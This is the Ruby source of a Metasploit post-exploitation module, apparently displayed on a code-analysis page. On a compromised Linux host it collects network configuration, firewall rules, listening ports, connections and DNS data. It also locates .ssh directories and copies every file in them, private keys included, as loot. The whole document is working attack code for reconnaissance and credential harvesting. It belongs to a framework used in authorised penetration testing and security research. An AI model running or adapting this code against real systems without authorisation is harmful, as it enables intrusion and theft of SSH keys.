rapid7/metasploit-framework

View on GitHub
modules/post/linux/gather/enum_network.rb

Summary

Maintainability
A
1 hr
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather Network Information',
        'Description' => %q{
          This module gathers network information from the target system
          IPTables rules, interfaces, wireless information, open and listening
          ports, active network connections, DNS information and SSH information.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  # Run Method for when run command is issued
  def run
    print_status("Running module against #{get_hostname} (#{session.session_host})")

    user = execute('/usr/bin/whoami')
    print_status("Module running as #{user}")

    # Collect data
    distro = get_sysinfo
    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    print_status('Collecting data...')

    nconfig = execute('/sbin/ifconfig -a')
    routes = execute('/sbin/route -e')
    iptables = execute('/sbin/iptables -L')
    iptables_nat = execute('/sbin/iptables -L -t nat')
    iptables_man = execute('/sbin/iptables -L -t mangle')
    resolv = cat_file('/etc/resolv.conf')
    sshd_conf = cat_file('/etc/ssh/sshd_config')
    hosts = cat_file('/etc/hosts')
    connections = execute('/usr/bin/lsof -nPi')
    wireless = execute('/sbin/iwconfig')
    open_ports = execute('/bin/netstat -tulpn')
    updown = execute('ls -R /etc/network')

    ssh_keys = get_ssh_keys

    # Save Enumerated data
    save('Network config', nconfig)
    save('Route table', routes)
    save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)
    save('DNS config', resolv)
    save('SSHD config', sshd_conf)
    save('Host file', hosts)
    save('SSH keys', ssh_keys) unless ssh_keys.empty?
    save('Active connections', connections)
    save('Wireless information', wireless)
    save('Listening ports', open_ports)
    save('If-Up/If-Down', updown)
  end

  # Save enumerated data
  def save(msg, data, ctype = 'text/plain')
    unless data && !data.empty?
      print_bad("Unable to get data for #{msg}")
      return
    end
    ltype = 'linux.enum.network'
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  def execute(cmd)
    verification_token = Rex::Text.rand_text_alpha(8)
    vprint_status("Execute: #{cmd}")
    output = cmd_exec(cmd + " || echo #{verification_token}")
    return nil if output.include?(verification_token)

    return output
  end

  def cat_file(filename)
    vprint_status("Download: #{filename}")
    output = read_file(filename)
    return output
  end

  def get_ssh_keys
    keys = []

    # Look for .ssh folder, "~/" might not work everytime
    vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')
    dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")
    ssh_base = ''
    dirs.each do |d|
      if d =~ %r{(^/)(.*)\.ssh$}
        ssh_base = d
        break
      end
    end

    # We didn't find .ssh :-(
    return [] if ssh_base == ''

    # List all the files under .ssh/
    files = execute("/bin/ls -a #{ssh_base}").chomp.split

    files.each do |k|
      next if k =~ /^(\.+)$/

      this_key = cat_file("#{ssh_base}/#{k}")
      keys << this_key
    end

    return keys
  end
end